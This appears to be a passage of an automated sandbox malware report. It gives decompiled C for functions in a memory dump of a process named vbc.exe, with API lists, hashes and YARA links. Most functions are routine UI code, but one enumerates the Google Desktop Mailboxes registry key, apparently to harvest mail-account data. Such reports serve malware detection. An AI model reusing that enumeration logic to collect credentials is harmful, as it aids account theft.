                                                                                                                                                                        0x0040870d
                                                                                                                                                                        0x00408715
                                                                                                                                                                        0x00408717
                                                                                                                                                                        0x0040871b
                                                                                                                                                                        0x0040871d
                                                                                                                                                                        0x0040871e
                                                                                                                                                                        0x00408724
                                                                                                                                                                        0x00408724
                                                                                                                                                                        0x00408726
                                                                                                                                                                        0x00408727
                                                                                                                                                                        0x0040872c
                                                                                                                                                                        0x0040872e
                                                                                                                                                                        0x00408734
                                                                                                                                                                        0x00408737
                                                                                                                                                                        0x0040873a
                                                                                                                                                                        0x00408741

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                                                        • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                        • Instruction ID: 072aa514f388f074079b8f328b082be18a1f899df3a3abdece790e68ac814aea
                                                                                                                                                                        • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                                        • Instruction Fuzzy Hash: 97F0F4725057115FDB309FB99EC055BBBD5BB08714760093FF28AD3641CB79A890C618
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408742 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                        			E00408742(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x414350;
				E004086DC(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B8A(_t21);
					_push(_t21);
					L00412096();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B8A(_t22);
					_push(_t22);
					L00412096();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B8A(_t23);
					_push(_t23);
					L00412096();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B8A(_t24);
					_push(_t24);
					L00412096();
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                                                                                                        0x00408742
                                                                                                                                                                        0x00408745
                                                                                                                                                                        0x0040874b
                                                                                                                                                                        0x00408750
                                                                                                                                                                        0x00408755
                                                                                                                                                                        0x00408757
                                                                                                                                                                        0x0040875c
                                                                                                                                                                        0x0040875d
                                                                                                                                                                        0x00408762
                                                                                                                                                                        0x00408763
                                                                                                                                                                        0x00408768
                                                                                                                                                                        0x0040876a
                                                                                                                                                                        0x0040876f
                                                                                                                                                                        0x00408770
                                                                                                                                                                        0x00408775
                                                                                                                                                                        0x00408776
                                                                                                                                                                        0x0040877b
                                                                                                                                                                        0x0040877d
                                                                                                                                                                        0x00408782
                                                                                                                                                                        0x00408783
                                                                                                                                                                        0x00408788
                                                                                                                                                                        0x00408789
                                                                                                                                                                        0x0040878e
                                                                                                                                                                        0x00408790
                                                                                                                                                                        0x00408795
                                                                                                                                                                        0x00408796
                                                                                                                                                                        0x0040879b
                                                                                                                                                                        0x0040879c
                                                                                                                                                                        0x004087a6
                                                                                                                                                                        0x004087aa
                                                                                                                                                                        0x004087b0

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 004087AA
                                                                                                                                                                          • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                                        • Opcode ID: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                        • Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
                                                                                                                                                                        • Opcode Fuzzy Hash: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
                                                                                                                                                                        • Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EE8B Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 19%
                                                                                                                                                                        			E0040EE8B(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040EB15(__ecx, __ecx, __eflags);
					E0040649B(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E00401558(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E004062DB(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, GetSysColor(5));
					SetTextColor(_a8, 0xc00000);
					return GetSysColorBrush(5);
				}
			}







                                                                                                                                                                        0x0040ee8b
                                                                                                                                                                        0x0040ee91
                                                                                                                                                                        0x0040ee97
                                                                                                                                                                        0x0040ee99
                                                                                                                                                                        0x0040eee2
                                                                                                                                                                        0x0040eeea
                                                                                                                                                                        0x0040eef0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eefb
                                                                                                                                                                        0x0040ee9e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eead
                                                                                                                                                                        0x0040eeb2
                                                                                                                                                                        0x0040eec4
                                                                                                                                                                        0x0040eed2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040eeda

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
                                                                                                                                                                          • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
                                                                                                                                                                          • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040EEB2
                                                                                                                                                                        • GetSysColor.USER32(00000005), ref: 0040EEBA
                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0040EEC4
                                                                                                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 0040EED2
                                                                                                                                                                        • GetSysColorBrush.USER32(00000005), ref: 0040EEDA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$BrushClassModeNameText_stricmpmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1869857563-0
                                                                                                                                                                        • Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                        • Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
                                                                                                                                                                        • Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
                                                                                                                                                                        • Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B21F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040B21F(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AFC4(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AF8A(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040AECD(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A3E9(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AEB7(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x414570;
						E004019DA(_t93,  &_v520, 0x4133fc);
						E004019DA(_t93,  &_v265, 0x413438);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E004014EA(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x414570
						_t54 = E004013E7(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AE52(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040ADA4(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A3E9(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A175( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A3E9(0, _t93, _t104, 0);
								E0040A5A1(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x414028;
								E0040596A( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x414028;
								_t54 = E004013E7( &_v560);
								_t104 = _v572;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t54 = E00408DAB( *((intOrPtr*)(_t104 + 0x370)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t54 = E00409DE2( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
							}
							goto L43;
						}
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, _t97, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x1000);
						goto L21;
					} else {
						_t72 =  *((intOrPtr*)(_t104 + 0x370));
						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
							_t54 = E004087BE(_t72, 0xffffffff, 2, 2);
							goto L23;
						}
						_push(0xf000);
						_push(0x2000);
						L21:
						_push(0xffffffff);
						_t54 = E004087BE(_t72);
						goto L43;
					}
				} else {
					L43:
					return _t54;
				}
			}




















                                                                                                                                                                        0x0040b21f
                                                                                                                                                                        0x0040b22e
                                                                                                                                                                        0x0040b234
                                                                                                                                                                        0x0040b236
                                                                                                                                                                        0x0040b23a
                                                                                                                                                                        0x0040b247
                                                                                                                                                                        0x0040b250
                                                                                                                                                                        0x0040b258
                                                                                                                                                                        0x0040b258
                                                                                                                                                                        0x0040b25e
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b265
                                                                                                                                                                        0x0040b265
                                                                                                                                                                        0x0040b26a
                                                                                                                                                                        0x0040b26f
                                                                                                                                                                        0x0040b271
                                                                                                                                                                        0x0040b271
                                                                                                                                                                        0x0040b276
                                                                                                                                                                        0x0040b27b
                                                                                                                                                                        0x0040b27f
                                                                                                                                                                        0x0040b27f
                                                                                                                                                                        0x0040b28a
                                                                                                                                                                        0x0040b292
                                                                                                                                                                        0x0040b298
                                                                                                                                                                        0x0040b298
                                                                                                                                                                        0x0040b2a3
                                                                                                                                                                        0x0040b2a7
                                                                                                                                                                        0x0040b2a7
                                                                                                                                                                        0x0040b2b2
                                                                                                                                                                        0x0040b2bd
                                                                                                                                                                        0x0040b2c5
                                                                                                                                                                        0x0040b2d6
                                                                                                                                                                        0x0040b2db
                                                                                                                                                                        0x0040b2df
                                                                                                                                                                        0x0040b2e9
                                                                                                                                                                        0x0040b2ec
                                                                                                                                                                        0x0040b2ed
                                                                                                                                                                        0x0040b2fe
                                                                                                                                                                        0x0040b304
                                                                                                                                                                        0x0040b308
                                                                                                                                                                        0x0040b30d
                                                                                                                                                                        0x0040b30d
                                                                                                                                                                        0x0040b30f
                                                                                                                                                                        0x0040b313
                                                                                                                                                                        0x0040b318
                                                                                                                                                                        0x0040b31c
                                                                                                                                                                        0x0040b31c
                                                                                                                                                                        0x0040b326
                                                                                                                                                                        0x0040b357
                                                                                                                                                                        0x0040b357
                                                                                                                                                                        0x0040b35c
                                                                                                                                                                        0x0040b382
                                                                                                                                                                        0x0040b382
                                                                                                                                                                        0x0040b387
                                                                                                                                                                        0x0040b38b
                                                                                                                                                                        0x0040b38b
                                                                                                                                                                        0x0040b390
                                                                                                                                                                        0x0040b395
                                                                                                                                                                        0x0040b397
                                                                                                                                                                        0x0040b39f
                                                                                                                                                                        0x0040b3a5
                                                                                                                                                                        0x0040b3b7
                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bf
                                                                                                                                                                        0x0040b3c5
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b3cf
                                                                                                                                                                        0x0040b3d5
                                                                                                                                                                        0x0040b3dd
                                                                                                                                                                        0x0040b3e1
                                                                                                                                                                        0x0040b3e3
                                                                                                                                                                        0x0040b3e8
                                                                                                                                                                        0x0040b3fb
                                                                                                                                                                        0x0040b3fb
                                                                                                                                                                        0x0040b401
                                                                                                                                                                        0x0040b407
                                                                                                                                                                        0x0040b40d
                                                                                                                                                                        0x0040b40d
                                                                                                                                                                        0x0040b412
                                                                                                                                                                        0x0040b418
                                                                                                                                                                        0x0040b420
                                                                                                                                                                        0x0040b429
                                                                                                                                                                        0x0040b443
                                                                                                                                                                        0x0040b44a
                                                                                                                                                                        0x0040b44e
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b457
                                                                                                                                                                        0x0040b45d
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b46a
                                                                                                                                                                        0x0040b470
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b470
                                                                                                                                                                        0x0040b35e
                                                                                                                                                                        0x0040b364
                                                                                                                                                                        0x0040b36a
                                                                                                                                                                        0x0040b37d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b37d
                                                                                                                                                                        0x0040b36c
                                                                                                                                                                        0x0040b371
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b328
                                                                                                                                                                        0x0040b328
                                                                                                                                                                        0x0040b334
                                                                                                                                                                        0x0040b352
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b352
                                                                                                                                                                        0x0040b336
                                                                                                                                                                        0x0040b33b
                                                                                                                                                                        0x0040b340
                                                                                                                                                                        0x0040b340
                                                                                                                                                                        0x0040b342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b342
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b489
                                                                                                                                                                        0x0040b489

                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 0040B258
                                                                                                                                                                        • SetFocus.USER32(?,?,?), ref: 0040B2FE
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                        • String ID: pEA
                                                                                                                                                                        • API String ID: 3502187192-660962052
                                                                                                                                                                        • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                        • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                                                                                                                                                                        • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                        • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405CF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E00405CF8(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E004016E5(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E00401645(_t58, _t30, 0x3ed, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ee, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f4, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ef, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f0, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f1, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f5, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f2, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f3, 1, 1, 0);
					E00401645(_t58, _v8, 1, 1, 1, 0);
					E00401645(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E00401558(_t66, _a4, _a8, _a12);
			}










                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405cfc
                                                                                                                                                                        0x00405d03
                                                                                                                                                                        0x00405d05
                                                                                                                                                                        0x00405d08
                                                                                                                                                                        0x00405dfd
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405e1b
                                                                                                                                                                        0x00405e1b
                                                                                                                                                                        0x00405dff
                                                                                                                                                                        0x00405dff
                                                                                                                                                                        0x00405e02
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405d0e
                                                                                                                                                                        0x00405d11
                                                                                                                                                                        0x00405d19
                                                                                                                                                                        0x00405d27
                                                                                                                                                                        0x00405d2d
                                                                                                                                                                        0x00405d3f
                                                                                                                                                                        0x00405d51
                                                                                                                                                                        0x00405d63
                                                                                                                                                                        0x00405d75
                                                                                                                                                                        0x00405d87
                                                                                                                                                                        0x00405d99
                                                                                                                                                                        0x00405dab
                                                                                                                                                                        0x00405dbd
                                                                                                                                                                        0x00405dcb
                                                                                                                                                                        0x00405dda
                                                                                                                                                                        0x00405de2
                                                                                                                                                                        0x00405ded
                                                                                                                                                                        0x00405df3
                                                                                                                                                                        0x00405df6
                                                                                                                                                                        0x00405e33

                                                                                                                                                                        APIs
                                                                                                                                                                        • BeginDeferWindowPos.USER32 ref: 00405D11
                                                                                                                                                                          • Part of subcall function 00401645: GetDlgItem.USER32 ref: 00401655
                                                                                                                                                                          • Part of subcall function 00401645: GetClientRect.USER32 ref: 00401667
                                                                                                                                                                          • Part of subcall function 00401645: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 004016D1
                                                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 00405DE2
                                                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 2498372239-3993045852
                                                                                                                                                                        • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                        • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                                                                                                                                                                        • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                        • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407306 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00407306(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040F1B0(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040F276(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040F1B0(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E004071D6(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040F276(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                                                                                                                        0x00407306
                                                                                                                                                                        0x00407323
                                                                                                                                                                        0x00407328
                                                                                                                                                                        0x0040732d
                                                                                                                                                                        0x00407334
                                                                                                                                                                        0x0040733c
                                                                                                                                                                        0x00407341
                                                                                                                                                                        0x00407346
                                                                                                                                                                        0x00407353
                                                                                                                                                                        0x004073a1
                                                                                                                                                                        0x004073a1
                                                                                                                                                                        0x004073a6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040736e
                                                                                                                                                                        0x00407373
                                                                                                                                                                        0x00407378
                                                                                                                                                                        0x00407386
                                                                                                                                                                        0x0040738f
                                                                                                                                                                        0x0040738f
                                                                                                                                                                        0x00407396
                                                                                                                                                                        0x0040739c
                                                                                                                                                                        0x0040739c
                                                                                                                                                                        0x004073ac
                                                                                                                                                                        0x004073ac
                                                                                                                                                                        0x004073b3

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 00407341
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004073AC
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Google\Google Desktop\Mailboxes, xrefs: 00407319
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Close$EnumOpenmemset
                                                                                                                                                                        • String ID: Software\Google\Google Desktop\Mailboxes
